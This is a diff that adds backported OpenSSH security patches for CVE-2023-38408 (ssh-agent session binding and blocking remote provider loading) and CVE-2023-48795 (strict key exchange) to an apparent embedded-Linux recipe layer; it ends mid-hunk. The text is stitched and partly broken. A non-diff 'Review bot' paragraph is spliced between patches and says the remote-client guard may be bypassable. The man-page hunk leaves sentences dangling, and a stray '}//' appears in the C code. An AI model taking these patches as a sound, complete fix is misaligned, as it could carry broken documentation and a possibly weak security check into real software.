diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
new file mode 100644
index 0000000000..27b2eadfae
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
@@ -0,0 +1,39 @@
+From 343e2a2c0ef754a7a86118016b248f7a73f8d510 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:29:46 +0000
+Subject: [PATCH 10/12] upstream: fix the values of enum sock_type
+
+OpenBSD-Commit-ID: 18d048f4dbfbb159ff500cfc2700b8fb1407facd
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1a4b92758690faa12f49079dd3b72567f909466d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index c99927c..7f1e14b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -103,9 +103,9 @@
+ #define AGENT_RBUF_LEN (4096)
+
+ typedef enum {
+- AUTH_UNUSED,
+- AUTH_SOCKET,
+- AUTH_CONNECTION
++ AUTH_UNUSED = 0,
++ AUTH_SOCKET = 1,
++ AUTH_CONNECTION = 2,
+ } sock_type;
+
+ typedef struct socket_entry {
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
new file mode 100644
index 0000000000..c300393ebf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
@@ -0,0 +1,307 @@
+From 2b3b369c8cf71f9ef5942a5e074e6f86e7ca1e0c Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Sun, 19 Dec 2021 22:09:23 +0000
+Subject: [PATCH 11/12] upstream: ssh-agent side of binding
+
+record session ID/hostkey/forwarding status for each active socket.
+
+Attempt to parse data-to-be-signed at signature request time and extract
+session ID from the blob if it is a pubkey userauth request.
+
+ok markus@
+
+OpenBSD-Commit-ID: a80fd41e292b18b67508362129e9fed549abd318
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/4c1e3ce85e183a9d0c955c88589fed18e4d6a058]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ authfd.h | 3 +
+ ssh-agent.c | 175 +++++++++++++++++++++++++++++++++++++++++++++++++---
+ 2 files changed, 170 insertions(+), 8 deletions(-)
+
+diff --git a/authfd.h b/authfd.h
+index c3bf625..9cc9807 100644
+--- a/authfd.h
++++ b/authfd.h
+@@ -76,6 +76,9 @@ int ssh_agent_sign(int sock, const struct sshkey *key,
+ #define SSH2_AGENTC_ADD_ID_CONSTRAINED 25
+ #define SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED 26
+
++/* generic extension mechanism */
++#define SSH_AGENTC_EXTENSION 27
++
+ #define SSH_AGENT_CONSTRAIN_LIFETIME 1
+ #define SSH_AGENT_CONSTRAIN_CONFIRM 2
+ #define SSH_AGENT_CONSTRAIN_MAXSIGN 3
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7f1e14b..01c7f2b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -98,9 +98,15 @@
+ #endif
+
+ /* Maximum accepted message length */
+-#define AGENT_MAX_LEN (256*1024)
++#define AGENT_MAX_LEN (256*1024)
+ /* Maximum bytes to read from client socket */
+-#define AGENT_RBUF_LEN (4096)
++#define AGENT_RBUF_LEN (4096)
++/* Maximum number of recorded session IDs/hostkeys per connection */
++#define AGENT_MAX_SESSION_IDS 16
++/* Maximum size of session ID */
++#define AGENT_MAX_SID_LEN 128
++
++/* XXX store hostkey_sid in a refcounted tree */
+
+ typedef enum {
+ AUTH_UNUSED = 0,
+@@ -108,12 +114,20 @@ typedef enum {
+ AUTH_CONNECTION = 2,
+ } sock_type;
+
++struct hostkey_sid {
++ struct sshkey *key;
++ struct sshbuf *sid;
++ int forwarded;
++};
++
+ typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+ struct sshbuf *output;
+ struct sshbuf *request;
++ size_t nsession_ids;
++ struct hostkey_sid *session_ids;
+ } SocketEntry;
+
+ u_int sockets_alloc = 0;
+@@ -174,10 +188,17 @@ static int restrict_websafe = 1;
+ static void
+ close_socket(SocketEntry *e)
+ {
++ size_t i;
++
+ close(e->fd);
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ for (i = 0; i < e->nsession_ids; i++) {
++ sshkey_free(e->session_ids[i].key);
++ sshbuf_free(e->session_ids[i].sid);
++ }
++ free(e->session_ids);
+ memset(e, '\0', sizeof(*e));
+ e->fd = -1;
+ e->type = AUTH_UNUSED;
+@@ -423,6 +444,18 @@ check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
+ return 0;
+ }
+
++static int
++buf_equal(const struct sshbuf *a, const struct sshbuf *b)
++{
++ if (sshbuf_ptr(a) == NULL || sshbuf_ptr(b) == NULL)
++ return SSH_ERR_INVALID_ARGUMENT;
++ if (sshbuf_len(a) != sshbuf_len(b))
++ return SSH_ERR_INVALID_FORMAT;
++ if (timingsafe_bcmp(sshbuf_ptr(a), sshbuf_ptr(b), sshbuf_len(a)) != 0)
++ return SSH_ERR_INVALID_FORMAT;
++ return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -431,8 +464,8 @@ process_sign_request2(SocketEntry *e)
+ size_t i, slen = 0;
+ u_int compat = 0, flags;
+ int r, ok = -1;
+- char *fp = NULL;
+- struct sshbuf *msg = NULL, *data = NULL;
++ char *fp = NULL, *user = NULL, *sig_dest = NULL;
++ struct sshbuf *msg = NULL, *data = NULL, *sid = NULL;
+ struct sshkey *key = NULL;
+ struct identity *id;
+ struct notifier_ctx *notifier = NULL;
+@@ -452,7 +485,33 @@ process_sign_request2(SocketEntry *e)
+ verbose("%s: %s key not found", __func__, sshkey_type(key));
+ goto send;
+ }
+- if (id->confirm && confirm_key(id, NULL) != 0) {
++ /*
++ * If session IDs were recorded for this socket, then use them to
++ * annotate the confirmation messages with the host keys.
++ */
++ if (e->nsession_ids > 0 &&
++ parse_userauth_request(data, key, &user, &sid) == 0) {
++ /*
++ * session ID from userauth request should match the final
++ * ID in the list recorded in the socket, unless the ssh
++ * client at that point lacks the binding extension (or if
++ * an attacker is trying to steal use of the agent).
++ */
++ i = e->nsession_ids - 1;
++ if (buf_equal(sid, e->session_ids[i].sid) == 0) {
++ if ((fp = sshkey_fingerprint(e->session_ids[i].key,
++ SSH_FP_HASH_DEFAULT, SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ debug3("%s: destination %s %s (slot %zu)", __func__,
++ sshkey_type(e->session_ids[i].key), fp, i);
++ xasprintf(&sig_dest, "public key request for "
++ "target user \"%s\" to %s %s", user,
++ sshkey_type(e->session_ids[i].key), fp);
++ free(fp);
++ fp = NULL;
++ }
++ }//
++ if (id->confirm && confirm_key(id, sig_dest) != 0) {
+ verbose("%s: user refused key", __func__);
+ goto send;
+ }
+@@ -467,8 +526,10 @@ process_sign_request2(SocketEntry *e)
+ SSH_FP_DEFAULT)) == NULL)
+ fatal("%s: fingerprint failed", __func__);
+ notifier = notify_start(0,
+- "Confirm user presence for key %s %s",
+- sshkey_type(id->key), fp);
++ "Confirm user presence for key %s %s%s%s",
++ sshkey_type(id->key), fp,
++ sig_dest == NULL ? "" : "\n",
++ sig_dest == NULL ? "" : sig_dest);
+ }
+ }
+ if ((r = sshkey_sign(id->key, &signature, &slen,
+@@ -492,11 +553,14 @@ process_sign_request2(SocketEntry *e)
+ if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+
++ sshbuf_free(sid);
+ sshbuf_free(data);
+ sshbuf_free(msg);
+ sshkey_free(key);
+ free(fp);
+ free(signature);
++ free(sig_dest);
++ free(user);
+ }
+
+ /* shared */
+@@ -925,6 +989,98 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
++static int
++process_ext_session_bind(SocketEntry *e)
++{
++ int r, sid_match, key_match;
++ struct sshkey *key = NULL;
++ struct sshbuf *sid = NULL, *sig = NULL;
++ char *fp = NULL;
++ u_char fwd;
++ size_t i;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshkey_froms(e->request, &key)) != 0 ||
++ (r = sshbuf_froms(e->request, &sid)) != 0 ||
++ (r = sshbuf_froms(e->request, &sig)) != 0 ||
++ (r = sshbuf_get_u8(e->request, &fwd)) != 0) {
++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto out;
++ }
++ if ((fp = sshkey_fingerprint(key, SSH_FP_HASH_DEFAULT,
++ SSH_FP_DEFAULT)) == NULL)
++ fatal("%s: fingerprint failed", __func__);
++ /* check signature with hostkey on session ID */
++ if ((r = sshkey_verify(key, sshbuf_ptr(sig), sshbuf_len(sig),
++ sshbuf_ptr(sid), sshbuf_len(sid), NULL, 0, NULL)) != 0) {
++ error("%s: sshkey_verify for %s %s: %s", __func__, sshkey_type(key), fp, ssh_err(r));
++ goto out;
++ }
++ /* check whether sid/key already recorded */
++ for (i = 0; i < e->nsession_ids; i++) {
++ sid_match = buf_equal(sid, e->session_ids[i].sid) == 0;
++ key_match = sshkey_equal(key, e->session_ids[i].key);
++ if (sid_match && key_match) {
++ debug("%s: session ID already recorded for %s %s", __func__,
++ sshkey_type(key), fp);
++ r = 0;
++ goto out;
++ } else if (sid_match) {
++ error("%s: session ID recorded against different key "
++ "for %s %s", __func__, sshkey_type(key), fp);
++ r = -1;
++ goto out;
++ }
++ /*
++ * new sid with previously-seen key can happen, e.g. multiple
++ * connections to the same host.
++ */
++ }
++ /* record new key/sid */
++ if (e->nsession_ids >= AGENT_MAX_SESSION_IDS) {
++ error("%s: too many session IDs recorded", __func__);
++ goto out;
++ }
++ e->session_ids = xrecallocarray(e->session_ids, e->nsession_ids,
++ e->nsession_ids + 1, sizeof(*e->session_ids));
++ i = e->nsession_ids++;
++ debug("%s: recorded %s %s (slot %zu of %d)", __func__, sshkey_type(key), fp, i,
++ AGENT_MAX_SESSION_IDS);
++ e->session_ids[i].key = key;
++ e->session_ids[i].forwarded = fwd != 0;
++ key = NULL; /* transferred */
++ /* can't transfer sid; it's refcounted and scoped to request's life */
++ if ((e->session_ids[i].sid = sshbuf_new()) == NULL)
++ fatal("%s: sshbuf_new", __func__);
++ if ((r = sshbuf_putb(e->session_ids[i].sid, sid)) != 0)
++ fatal("%s: sshbuf_putb session ID: %s", __func__, ssh_err(r));
++ /* success */
++ r = 0;
++ out:
++ sshkey_free(key);
++ sshbuf_free(sid);
++ sshbuf_free(sig);
++ return r == 0 ? 1 : 0;
++}
++
++static void
++process_extension(SocketEntry *e)
++{
++ int r, success = 0;
++ char *name;
++
++ debug2("%s: entering", __func__);
++ if ((r = sshbuf_get_cstring(e->request, &name, NULL)) != 0) {
++ error("%s: parse: %s", __func__, ssh_err(r));
++ goto send;
++ }
++ if (strcmp(name, "session-bind@openssh.com") == 0)
++ success = process_ext_session_bind(e);
++ else
++ debug("%s: unsupported extension \"%s\"", __func__, name);
++send:
++ send_status(e, success);
++}
+ /*
+ * dispatch incoming message.
+ * returns 1 on success, 0 for incomplete messages or -1 on error.
+@@ -1019,6 +1175,9 @@ process_message(u_int socknum)
+ process_remove_smartcard_key(e);
+ break;
+ #endif /* ENABLE_PKCS11 */
++ case SSH_AGENTC_EXTENSION:
++ process_extension(e);
++ break;
+ default:
+ /* Unknown message. Respond with failure. */
+ error("Unknown message %d", type);
+--
+2.41.0
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
new file mode 100644
index 0000000000..934775bdec
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-12.patch
@@ -0,0 +1,120 @@
+From 4fe3d0fbd3d6dc1f19354e0d73a3231c461ed044 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Wed, 19 Jul 2023 13:56:33 +0000
+Subject: [PATCH 12/12] upstream: Disallow remote addition of FIDO/PKCS11
+ provider libraries to ssh-agent by default.
+
+The old behaviour of allowing remote clients from loading providers
+can be restored using `ssh-agent -O allow-remote-pkcs11`.
+
+Detection of local/remote clients requires a ssh(1) that supports
+the `session-bind@openssh.com` extension. Forwarding access to a
+ssh-agent socket using non-OpenSSH tools may circumvent this control.
+
+ok markus@
+
+OpenBSD-Commit-ID: 4c2bdf79b214ae7e60cc8c39a45501344fa7bd7c
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1f2731f5d7a8f8a8385c6031667ed29072c0d92a]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.1 | 20 ++++++++++++++++++++
+ ssh-agent.c | 26 ++++++++++++++++++++++++--
+ 2 files changed, 44 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.1 b/ssh-agent.1
+index fff0db6..a0f1e21 100644
+--- a/ssh-agent.1
++++ b/ssh-agent.1
+@@ -97,6 +97,26 @@ The default is
+ Kill the current agent (given by the
+ .Ev SSH_AGENT_PID
+ environment variable).
++Currently two options are supported:
++.Cm allow-remote-pkcs11
++and
++.Pp
++The
++.Cm allow-remote-pkcs11
++option allows clients of a forwarded
++.Nm
++to load PKCS#11 or FIDO provider libraries.
++By default only local clients may perform this operation.
++Note that signalling that a
++.Nm
++client remote is performed by
++.Xr ssh 1 ,
++and use of other tools to forward access to the agent socket may circumvent
++this restriction.
++.Pp
++The
++.Cm no-restrict-websafe ,
++instructs
+ .It Fl P Ar provider_whitelist
+ Specify a pattern-list of acceptable paths for PKCS#11 and FIDO authenticator
+ shared libraries that may be used with the
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 01c7f2b..40c1b6b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.300 2023/07/19 13:56:33 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -167,6 +167,12 @@ char socket_dir[PATH_MAX];
+ /* PKCS#11/Security key path whitelist */
+ static char *provider_whitelist;
+
++/*
++ * Allows PKCS11 providers or SK keys that use non-internal providers to
++ * be added over a remote connection (identified by session-bind@openssh.com).
++ */
++static int remote_add_provider;
++
+ /* locking */
+ #define LOCK_SIZE 32
+ #define LOCK_SALT_SIZE 16
+@@ -736,6 +742,15 @@ process_add_identity(SocketEntry *e)
+ if (strcasecmp(sk_provider, "internal") == 0) {
+ debug("%s: internal provider", __func__);
+ } else {
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed add of SK provider \"%.100s\": "
++ "remote addition of providers is disabled",
++ sk_provider);
++ free(sk_provider);
++ free(comment);
++ sshkey_free(k);
++ goto send;
++ }
+ if (realpath(sk_provider, canonical_provider) == NULL) {
+ verbose("failed provider \"%.100s\": "
+ "realpath: %s", sk_provider,
+@@ -901,6 +916,11 @@ process_add_smartcard_key(SocketEntry *e)
+ goto send;
+ }
+ }
++ if (e->nsession_ids != 0 && !remote_add_provider) {
++ verbose("failed PKCS#11 add of \"%.100s\": remote addition of "
++ "providers is disabled", provider);
++ goto send;
++ }
+ if (realpath(provider, canonical_provider) == NULL) {
+ verbose("failed PKCS#11 add of \"%.100s\": realpath: %s",
+ provider, strerror(errno));
+@@ -1556,7 +1576,9 @@ main(int ac, char **av)
+ break;
+ case 'O':
+ if (strcmp(optarg, "no-restrict-websafe") == 0)
+- restrict_websafe = 0;
++ restrict_websafe = 0;
++ else if (strcmp(optarg, "allow-remote-pkcs11") == 0)
++ remote_add_provider = 1;
+ else
+ fatal("Unknown -O option");
+ break;
+--
+2.41.0
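Review bot: Both new guards (in process_add_identity and process_add_smartcard_key) classify a client as remote only by `e->nsession_ids != 0`. In the preceding patch of this series that counter appears to be incremented only after a session-bind request has been parsed and its signature verified, so a socket whose bind request was rejected would still be treated as local. Consider recording the attempt itself on the socket entry when process_ext_session_bind is entered and testing it together with the counter, e.g. `if ((e->session_bind_attempted || e->nsession_ids != 0) && !remote_add_provider) {` (the flag would be a new SocketEntry field). Separately, the ssh-agent.1 hunk inserts the new text under the -k entry without an `.It Fl O` header and leaves "and" and "instructs" dangling, so `allow-remote-pkcs11` ends up documented in the wrong place and incomplete. Both C functions start and end outside the hunks shown.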
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
new file mode 100644
index 0000000000..57c45e3d93
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-48795.patch
@@ -0,0 +1,468 @@
+(modified to not remove ssh_packet_read_expect(), to add to
+KexAlgorithms in sshd.c and sshconnect2.c as this version pre-dates
+kex_proposal_populate_entries(), replace debug*_f() with debug*(),
+error*_f() with error*(), and fatal_f() with fatal())
+
+Backport of:
+
+From 1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Mon, 18 Dec 2023 14:45:17 +0000
+Subject: [PATCH] upstream: implement "strict key exchange" in ssh and sshd
+
+This adds a protocol extension to improve the integrity of the SSH
+transport protocol, particular in and around the initial key exchange
+(KEX) phase.
+
+Full details of the extension are in the PROTOCOL file.
+
+with markus@
+
+OpenBSD-Commit-ID: 2a66ac962f0a630d7945fee54004ed9e9c439f14
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/openssh/tree/debian/patches/CVE-2023-48795.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/openssh/openssh-portable/commit/1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5]
+CVE: CVE-2023-48795
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ PROTOCOL | 26 +++++++++++++++++
+ kex.c | 68 +++++++++++++++++++++++++++++++++-----------
+ kex.h | 1 +
+ packet.c | 78 ++++++++++++++++++++++++++++++++++++++-------------
+ sshconnect2.c | 14 +++------
+ sshd.c | 7 +++--
+ 6 files changed, 146 insertions(+), 48 deletions(-)
+
+diff --git a/PROTOCOL b/PROTOCOL
+index f75c1c0..89bddfe 100644
+--- a/PROTOCOL
++++ b/PROTOCOL
+@@ -102,6 +102,32 @@ OpenSSH supports the use of ECDH in Curve25519 for key exchange as
+ described at:
+ http://git.libssh.org/users/aris/libssh.git/plain/doc/curve25519-sha256@libssh.org.txt?h=curve25519
+
++1.9 transport: strict key exchange extension
++
++OpenSSH supports a number of transport-layer hardening measures under
++a "strict KEX" feature. This feature is signalled similarly to the
++RFC8308 ext-info feature: by including a additional algorithm in the
++initiial SSH2_MSG_KEXINIT kex_algorithms field. The client may append
++"kex-strict-c-v00@openssh.com" to its kex_algorithms and the server
++may append "kex-strict-s-v00@openssh.com". These pseudo-algorithms
++are only valid in the initial SSH2_MSG_KEXINIT and MUST be ignored
++if they are present in subsequent SSH2_MSG_KEXINIT packets.
++
++When an endpoint that supports this extension observes this algorithm
++name in a peer's KEXINIT packet, it MUST make the following changes to
++the the protocol:
++
++a) During initial KEX, terminate the connection if any unexpected or
++ out-of-sequence packet is received. This includes terminating the
++ connection if the first packet received is not SSH2_MSG_KEXINIT.
++ Unexpected packets for the purpose of strict KEX include messages
++ that are otherwise valid at any time during the connection such as
++ SSH2_MSG_DEBUG and SSH2_MSG_IGNORE.
++b) After sending or receiving a SSH2_MSG_NEWKEYS message, reset the
++ packet sequence number to zero. This behaviour persists for the
++ duration of the connection (i.e. not just the first
++ SSH2_MSG_NEWKEYS).
++
+ 2. Connection protocol changes
+
+ 2.1. connection: Channel write close extension "eow@openssh.com"
+diff --git a/kex.c b/kex.c
+index ce85f04..3129a4e 100644
+--- a/kex.c
++++ b/kex.c
+@@ -63,7 +63,7 @@
+ #include "digest.h"
+
+ /* prototype */
+-static int kex_choose_conf(struct ssh *);
++static int kex_choose_conf(struct ssh *, uint32_t seq);
+ static int kex_input_newkeys(int, u_int32_t, struct ssh *);
+
+ static const char *proposal_names[PROPOSAL_MAX] = {
+@@ -173,6 +173,18 @@ kex_names_valid(const char *names)
+ return 1;
+ }
+
++/* returns non-zero if proposal contains any algorithm from algs */
++static int
++has_any_alg(const char *proposal, const char *algs)
++{
++ char *cp;
++
++ if ((cp = match_list(proposal, algs, NULL)) == NULL)
++ return 0;
++ free(cp);
++ return 1;
++}
++
+ /*
+ * Concatenate algorithm names, avoiding duplicates in the process.
+ * Caller must free returned string.
+@@ -180,7 +192,7 @@ kex_names_valid(const char *names)
+ char *
+ kex_names_cat(const char *a, const char *b)
+ {
+- char *ret = NULL, *tmp = NULL, *cp, *p, *m;
++ char *ret = NULL, *tmp = NULL, *cp, *p;
+ size_t len;
+
+ if (a == NULL || *a == '\0')
+@@ -197,10 +209,8 @@ kex_names_cat(const char *a, const char *b)
+ }
+ strlcpy(ret, a, len);
+ for ((p = strsep(&cp, ",")); p && *p != '\0'; (p = strsep(&cp, ","))) {
+- if ((m = match_list(ret, p, NULL)) != NULL) {
+- free(m);
++ if (has_any_alg(ret, p))
+ continue; /* Algorithm already present */
+- }
+ if (strlcat(ret, ",", len) >= len ||
+ strlcat(ret, p, len) >= len) {
+ free(tmp);
+@@ -409,7 +419,12 @@ kex_protocol_error(int type, u_int32_t seq, struct ssh *ssh)
+ {
+ int r;
+
+- error("kex protocol error: type %d seq %u", type, seq);
++ /* If in strict mode, any unexpected message is an error */
++ if ((ssh->kex->flags & KEX_INITIAL) && ssh->kex->kex_strict) {
++ ssh_packet_disconnect(ssh, "strict KEX violation: "
++ "unexpected packet type %u (seqnr %u)", type, seq);
++ }
++ error("type %u seq %u", type, seq);
+ if ((r = sshpkt_start(ssh, SSH2_MSG_UNIMPLEMENTED)) != 0 ||
+ (r = sshpkt_put_u32(ssh, seq)) != 0 ||
+ (r = sshpkt_send(ssh)) != 0)
+@@ -481,6 +496,11 @@ kex_input_ext_info(int type, u_int32_t seq, struct ssh *ssh)
+ ssh_dispatch_set(ssh, SSH2_MSG_EXT_INFO, &kex_protocol_error);
+ if ((r = sshpkt_get_u32(ssh, &ninfo)) != 0)
+ return r;
++ if (ninfo >= 1024) {
++ error("SSH2_MSG_EXT_INFO with too many entries, expected "
++ "<=1024, received %u", ninfo);
++ return dispatch_protocol_error(type, seq, ssh);
++ }
+ for (i = 0; i < ninfo; i++) {
+ if ((r = sshpkt_get_cstring(ssh, &name, NULL)) != 0)
+ return r;
+@@ -581,7 +601,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ error("%s: no hex", __func__);
+ return SSH_ERR_INTERNAL_ERROR;
+ }
+- ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, NULL);
++ ssh_dispatch_set(ssh, SSH2_MSG_KEXINIT, &kex_protocol_error);
+ ptr = sshpkt_ptr(ssh, &dlen);
+ if ((r = sshbuf_put(kex->peer, ptr, dlen)) != 0)
+ return r;
+@@ -617,7 +637,7 @@ kex_input_kexinit(int type, u_int32_t seq, struct ssh *ssh)
+ if (!(kex->flags & KEX_INIT_SENT))
+ if ((r = kex_send_kexinit(ssh)) != 0)
+ return r;
+- if ((r = kex_choose_conf(ssh)) != 0)
++ if ((r = kex_choose_conf(ssh, seq)) != 0)
+ return r;
+
+ if (kex->kex_type < KEX_MAX && kex->kex[kex->kex_type] != NULL)
+@@ -880,7 +900,13 @@ proposals_match(char *my[PROPOSAL_MAX], char *peer[PROPOSAL_MAX])
+ }
+
+ static int
+-kex_choose_conf(struct ssh *ssh)
++kexalgs_contains(char **peer, const char *ext)
++{
++ return has_any_alg(peer[PROPOSAL_KEX_ALGS], ext);
++}
++
++static int
++kex_choose_conf(struct ssh *ssh, uint32_t seq)
+ {
+ struct kex *kex = ssh->kex;
+ struct newkeys *newkeys;
+@@ -905,13 +931,23 @@ kex_choose_conf(struct ssh *ssh)
+ sprop=peer;
+ }
+
+- /* Check whether client supports ext_info_c */
+- if (kex->server && (kex->flags & KEX_INITIAL)) {
+- char *ext;
+-
+- ext = match_list("ext-info-c", peer[PROPOSAL_KEX_ALGS], NULL);
+- kex->ext_info_c = (ext != NULL);
+- free(ext);
++ /* Check whether peer supports ext_info/kex_strict */
++ if ((kex->flags & KEX_INITIAL) != 0) {
++ if (kex->server) {
++ kex->ext_info_c = kexalgs_contains(peer, "ext-info-c");
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-c-v00@openssh.com");
++ } else {
++ kex->kex_strict = kexalgs_contains(peer,
++ "kex-strict-s-v00@openssh.com");
++ }
++ if (kex->kex_strict) {
++ debug3("will use strict KEX ordering");
++ if (seq != 0)
++ ssh_packet_disconnect(ssh,
++ "strict KEX violation: "
++ "KEXINIT was not the first packet");
++ }
+ }
+
+ /* Algorithm Negotiation */
+diff --git a/kex.h b/kex.h
+index a5ae6ac..cae38f7 100644
+--- a/kex.h
++++ b/kex.h
+@@ -145,6 +145,7 @@ struct kex {
+ u_int kex_type;
+ char *server_sig_algs;
+ int ext_info_c;
++ int kex_strict;
+ struct sshbuf *my;
+ struct sshbuf *peer;
+ struct sshbuf *client_version;
+diff --git a/packet.c b/packet.c
+index 6d3e917..43139f9 100644
+--- a/packet.c
++++ b/packet.c
+@@ -1203,8 +1203,13 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ sshbuf_dump(state->output, stderr);
+ #endif
+ /* increment sequence number for outgoing packets */
+- if (++state->p_send.seqnr == 0)
++ if (++state->p_send.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "outgoing sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("outgoing seqnr wraps around");
++ }
+ if (++state->p_send.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1212,6 +1217,11 @@ ssh_packet_send2_wrapped(struct ssh *ssh)
+ state->p_send.bytes += len;
+ sshbuf_reset(state->outgoing_packet);
+
++ if (type == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting send seqnr %u", state->p_send.seqnr);
++ state->p_send.seqnr = 0;
++ }
++
+ if (type == SSH2_MSG_NEWKEYS)
+ r = ssh_set_newkeys(ssh, MODE_OUT);
+ else if (type == SSH2_MSG_USERAUTH_SUCCESS && state->server_side)
+@@ -1345,8 +1355,7 @@ ssh_packet_read_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ /* Stay in the loop until we have received a complete packet. */
+ for (;;) {
+ /* Try to read a packet from the buffer. */
+- r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p);
+- if (r != 0)
++ if ((r = ssh_packet_read_poll_seqnr(ssh, typep, seqnr_p)) != 0)
+ break;
+ /* If we got a packet, return it. */
+ if (*typep != SSH_MSG_NONE)
+@@ -1633,10 +1642,16 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ if ((r = sshbuf_consume(state->input, mac->mac_len)) != 0)
+ goto out;
+ }
++
+ if (seqnr_p != NULL)
+ *seqnr_p = state->p_read.seqnr;
+- if (++state->p_read.seqnr == 0)
++ if (++state->p_read.seqnr == 0) {
++ if ((ssh->kex->flags & KEX_INITIAL) != 0) {
++ ssh_packet_disconnect(ssh, "incoming sequence number "
++ "wrapped during initial key exchange");
++ }
+ logit("incoming seqnr wraps around");
++ }
+ if (++state->p_read.packets == 0)
+ if (!(ssh->compat & SSH_BUG_NOREKEY))
+ return SSH_ERR_NEED_REKEY;
+@@ -1702,6 +1717,10 @@ ssh_packet_read_poll2(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ #endif
+ /* reset for next packet */
+ state->packlen = 0;
++ if (*typep == SSH2_MSG_NEWKEYS && ssh->kex->kex_strict) {
++ debug("resetting read seqnr %u", state->p_read.seqnr);
++ state->p_read.seqnr = 0;
++ }
+
+ /* do we need to rekey? */
+ if (ssh_packet_need_rekeying(ssh, 0)) {
+@@ -1726,10 +1745,39 @@ ssh_packet_read_poll_seqnr(struct ssh *ssh, u_char *typep, u_int32_t *seqnr_p)
+ r = ssh_packet_read_poll2(ssh, typep, seqnr_p);
+ if (r != 0)
+ return r;
+- if (*typep) {
